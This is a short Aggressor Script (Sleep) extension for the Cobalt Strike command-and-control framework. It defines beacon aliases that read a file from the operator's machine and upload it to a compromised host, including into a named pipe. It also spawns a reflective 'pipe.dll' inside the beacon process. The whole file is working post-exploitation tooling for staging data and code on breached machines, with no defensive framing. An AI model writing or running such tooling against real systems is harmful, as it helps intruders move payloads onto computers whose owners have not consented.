beacon_command_register("upload_file", "Uploads a local file and send to a file accessible by the beacon host (including pipes)", "upload_pipe");

sub _upload_file{
	$handle = openf($2);
	$data = readb($handle, -1);
	closef($handle);
    bupload_raw($1, $3, $data);
}

alias upload_file {
	_upload_file($1, $2, $3);
}

alias dll {
	bdllspawn($1,script_resource("pipe.dll") , $2, "", 1000, false);
}
alias pipe {
	$handle = openf($2);
	$data = readb($handle, -1);
	closef($handle);
	$size = strlen($data);
	blog($1,"file size ".$size);
	fireAlias($1, "dll", $size);
	bupload_raw($1, "", $data);
	bupload_raw($1, "\\\\.\\pipe\\mynamedpipe", $data);
}
